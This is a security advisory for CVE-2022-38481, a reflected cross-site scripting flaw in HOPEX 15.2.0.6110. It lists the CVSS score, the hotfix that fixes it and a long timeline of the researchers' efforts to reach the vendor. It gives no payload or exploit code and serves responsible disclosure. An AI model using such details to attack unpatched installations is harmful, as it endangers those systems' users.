CVE-2022-38481

CVE-2022-38481

by mrahier96

Abstract Advisory Information

The application is prone to reflected Cross-site Scripting (XSS) attack in several features. This vulnerability allows an attacker to perform action on behalf of the users and exfiltrate data.

Author: Elliot Rasch

Version affected

Name: HOPEX

Versions: 15.2.0.6110

Common Vulnerability Scoring System

6.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Patch

Hotfix V5CP2

References

Vulnerability Disclosure Timeline

  • 17/05/2022: Vulnerability discovery
  • 18/05/2022: Vulnerability Report to CERT-XLM
  • 19/05/2022: Vulnerability Report to Vendor through Contact Form
  • 24/05/2022: Vulnerability Report to Vendor through Contact Form + Account created on their support portal
  • 03/06/2022: Called vendor, redirected us to specific email address
  • 10/06/2022: Investigation at given email address
  • 17/06/2022: Investigation at given email address
  • 24/06/2022: Investigation at given email address
  • 24/06/2022: Contacted Technical Support Manager
  • 24/06/2022: Vendor acknowledged and gave us contact point
  • 01/07/2022: Investigation at Technical Support email address
  • 08/07/2022: Reminder to the Technical Support email address
  • 22/07/2022: Investigation at given helpdesk and security email address
  • 22/07/2022: Investigation at personal email address
  • 03/08/2022: Called vendor, told reception to ask IT to recontact us
  • 19/08/2022: Update on all contact points we have
  • 19/08/2022: Request CVE ID to Mitre
  • 02/09/2022: CVE IDs assigned -> CVE-2022-38481
  • 14/09/2022: Vulnerability patched in V5CP2 Hotfix
  • 28/10/2022: Expected Vulnerability disclosure
Top